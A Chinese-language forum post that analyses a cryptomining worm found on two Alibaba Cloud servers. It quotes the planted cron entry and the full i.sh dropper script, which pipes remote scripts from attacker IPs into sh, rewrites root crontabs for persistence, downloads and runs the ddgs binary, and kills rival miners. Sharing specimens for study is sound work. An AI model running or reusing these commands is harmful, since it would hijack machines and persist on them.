最近有两台阿里云服务器中了挖矿病毒，CPU占用率一直百分百。本帖就不详细说明如何清除了，网上很多资源。由于好奇，我把该病毒的定时脚本给下载下来，大家可以学习一下。

中了招的主机，在计划任务中都有这么一段：

*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

意思是下载i.sh脚本并重定向到sh去执行。于是我就下载该脚本，并把原文先贴出来供大家批判性学习：

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "" > /var/spool/cron/root

echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root

echo "*/15 * * * * wget -q -O- http://13.113.240.221:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

ps auxf | grep -v grep | grep /tmp/ddgs.3014 || rm -rf /tmp/ddgs.3014
if [ ! -f "/tmp/ddgs.3014" ]; then
    wget -q http://13.113.240.221:8000/static/3014/ddgs.$(uname -m) -O /tmp/ddgs.3014

fi
chmod +x /tmp/ddgs.3014 && /tmp/ddgs.3014

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

这个脚本挺简单的，我看了没什么问题。各位看官如果有什么以为，可以留言讨论哈。